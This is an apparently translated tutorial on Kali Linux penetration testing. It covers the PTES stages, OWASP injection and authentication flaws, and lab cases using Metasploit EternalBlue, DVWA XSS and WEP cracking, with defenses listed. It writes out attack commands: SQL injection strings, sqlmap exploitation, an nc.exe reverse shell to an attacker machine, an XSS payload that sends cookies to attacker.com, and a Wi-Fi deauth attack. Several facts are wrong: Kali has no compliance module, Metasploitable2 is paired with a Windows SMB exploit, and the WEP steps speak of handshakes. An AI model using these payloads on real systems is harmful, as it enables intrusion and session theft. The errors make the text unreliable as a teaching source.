1. Core Value and System Features of Kali Linux Penetration Testing
Kali Linux, as the benchmark operating system in the field of penetration testing, demonstrates its core value in three aspects: tool integration, coverage of testing scenarios, and legal compliance. The system comes pre-installed with over 600 specialized tools, covering 12 categories including information gathering, vulnerability analysis, web application attacks, and password cracking, forming a complete closed loop from reconnaissance to post-exploitation attacks. For example, in web penetration testing, tools like OWASP ZAP, sqlmap, and Burp Suite can work together to perform vulnerability scanning, injection attacks, and session hijacking; in wireless network testing, tools like Aircrack-ng and Wifite support WEP/WPA2 cracking and rogue access point creation.

In terms of system features, Kali Linux adopts a rolling update mechanism, releasing stable versions quarterly and pushing tool updates weekly, ensuring that testers always use the latest vulnerability database. Its hardware support covers x86 and ARM architectures, and it can even be deployed on embedded devices like Raspberry Pi, meeting the testing needs of various scenarios such as enterprise intranets and the Internet of Things. Legally, the system includes compliance check modules for the “Cybersecurity Law” and “Data Security Law”, mandating the signing of authorization agreements before testing to avoid legal risks.
2. Penetration Testing Standards and OWASP Top 10 Framework
(1) International Testing Standards
Penetration testing must adhere to the **PTES (Penetration Testing Execution Standard)** and **OSSTMM (Open Source Security Testing Methodology Manual)** international standards. PTES divides the testing process into seven stages:
- 1. Pre-engagement Interactions: Define the scope of testing, target systems, and disclaimers.
- 2. Information Gathering: Use Nmap to scan for port services (e.g.,
<span>nmap -sS -p 80,443 192.168.1.1</span>), Shodan to search for device information, and Maltego for visualizing related domains and IPs. - 3. Threat Modeling: Calculate risk values based on the CIA triad (Confidentiality, Integrity, Availability) using the formula:[SLE = AV \times EF, \quad ALE = SLE \times ARO, \quad Risk = Asset Value \times Threat \times Vulnerability \times Impact]
- 4. Vulnerability Analysis: Use OpenVAS to scan for system vulnerabilities (e.g., CVE-2021-44228 Log4j vulnerability), and Nikto to detect web server configuration flaws.
- 5. Exploitation: Execute payloads using the Metasploit framework (e.g.,
<span>use exploit/windows/smb/ms17_010_eternalblue</span>). - 6. Post-Exploitation: Maintain access and move laterally to other hosts in the internal network.
- 7. Report Writing: Generate standardized reports containing vulnerability details and remediation suggestions using the Dradis framework.
(2) Practical Application of the OWASP Top 10 Framework
The OWASP Top 10 2023 edition categorizes web application risks into ten categories, with injection attacks and authentication failures accounting for over 60%. Below are the testing methods and defense strategies for these two types of vulnerabilities:
1. SQL Injection Attacks and Defenses
Attack Principle: Attackers manipulate query logic by constructing malicious SQL statements. For example, entering <span>admin' OR 1=1 --</span> in the login page can bypass password verification.
Testing Tool: Automated detection and exploitation using sqlmap
sqlmap -u "http://example.com/login.php?user=test&pass=test" --data "user=admin&pass=test" --level 5 --risk 3 --dbs
Defense Strategies:
- • Input Validation: Use PHP’s
<span>filter_var()</span>function to validate email format on the server side:function isValidEmail($email) { return filter_var($email, FILTER_VALIDATE_EMAIL); } - • Parameterized Queries: Prevent statement concatenation by using PHP with MySQLi:
$query = $dbConnection->prepare('SELECT * FROM users WHERE username = ?'); $query->bind_param('s', $username); $query->execute(); - • Principle of Least Privilege: Grant only necessary permissions to database users and disable dangerous stored procedures like
<span>xp_cmdshell</span>.
2. Authentication and Session Management Failures
Attack Principle: Weak password policies and session ID leaks lead to account hijacking. For example, the Firesheep tool can sniff unencrypted HTTP session cookies.
Testing Tool: Burp Suite to intercept and modify authentication requests
- 1. Capture the login request packet and change the
<span>password</span>field to<span>admin' OR '1'='1</span>. - 2. Modify the
<span>Cookie</span>field to the stolen legitimate session ID to bypass authentication.
Defense Strategies:
- • Strong Password Policy: Require passwords to be at least 12 characters long, including uppercase and lowercase letters, numbers, and special characters.
- • HTTPS Encryption: Enforce the use of TLS 1.2 or higher and disable unencrypted HTTP transmission.
- • Session Timeout: Set automatic expiration after 30 minutes of inactivity to prevent session fixation attacks.
3. Practical Cases of Kali Linux Penetration Testing
(1) Case 1: Exploiting SMB Vulnerability with Metasploit Framework
Target System: Metasploitable2 virtual machine (IP: 192.168.56.101)Vulnerability Principle: The Samba service has not patched the MS17-010 vulnerability, allowing remote code execution.
Operational Steps:
- 1. Information Gathering: Use Nmap to scan target ports and services
nmap -sV -O 192.168.56.101The output shows that port 445 (SMB service) is open.
- 2. Vulnerability Verification: Search for the vulnerability module in Metasploit
msfconsole search ms17_010 use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.56.101 exploitSuccessfully obtained a Meterpreter session and executed the
<span>sysinfo</span>command to view system information. - 3. Post-Exploitation Operations: Upload nc.exe to establish a reverse connection
upload /usr/share/windows-binaries/nc.exe C:\temp\ execute -f C:\temp\nc.exe -a "-e cmd.exe 192.168.56.102 4444"The attacking machine listens on port 4444 to receive the shell from the target system.
(2) Case 2: XSS Attacks and Defenses in Web Applications
Target System: DVWA (Damn Vulnerable Web Application)Vulnerability Principle: User input is not filtered, leading to the execution of malicious scripts.
Operational Steps:
- 1. Reflected XSS Testing:
- • Enter
<span><script>alert('XSS')</script></span>in the search box to trigger a popup. - • Use Burp Suite to intercept the request and modify the
<span>User-Agent</span>field to:<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script> - • Steal the administrator’s cookie to achieve session hijacking.
- • Submit
<span><img src=x onerror=alert(1)></span>on the message board, triggering the attack for all users visiting that page.
Defense Strategies:
- • Output Encoding: Use PHP’s
<span>htmlspecialchars()</span>function to escape special characters:echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8'); - • CSP Policy: Add
<span>Content-Security-Policy: default-src 'self'</span>in the HTTP header to prohibit loading external scripts.
(3) Case 3: Wireless Network Security Testing
Target Network: WEP encrypted Wi-Fi (SSID: TestNet)Vulnerability Principle: The WEP protocol uses the RC4 encryption algorithm, which has an IV (Initialization Vector) repetition issue, allowing key cracking through statistical attacks.
Operational Steps:
- 1. Listen for Handshake Packets:
airodump-ng wlan0mon --bssid 00:11:22:33:44:55 -c 6 --write wep_capture - 2. Launch Deauth Attack:
aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon - 3. Crack the Key:
aircrack-ng wep_capture-01.capThe output shows the key as
<span>1234567890</span>.
Defense Strategies:
- • Upgrade Encryption Protocol: Use WPA2-PSK or WPA3 and enable AES encryption.
- • Hide SSID: Disable SSID broadcasting in the router configuration.
- • MAC Filtering: Allow only authorized devices to connect to the network.
4. Ethical and Legal Boundaries of Penetration Testing
- 1. Written Authorization: A “Penetration Testing Authorization Letter” must be signed before testing, clearly defining the scope, time, and disclaimers.
- 2. Data Protection: Prohibit stealing, altering, or leaking sensitive data, and clean up all traces after testing.
- 3. Compliance Requirements: Adhere to Article 27 of the “Cybersecurity Law”, prohibiting illegal intrusion into computer information systems or providing attack tools.
The core of Kali Linux penetration testing lies in systematic and compliance. Testers must master standards frameworks like PTES and OWASP, combined with tools like Nmap, Metasploit, and sqlmap, to form a complete chain from information gathering to vulnerability exploitation. In the future, with the proliferation of AI technology, automated penetration testing tools will further enhance efficiency, but the ethical awareness and legal literacy of testers remain key to ensuring the healthy development of the industry.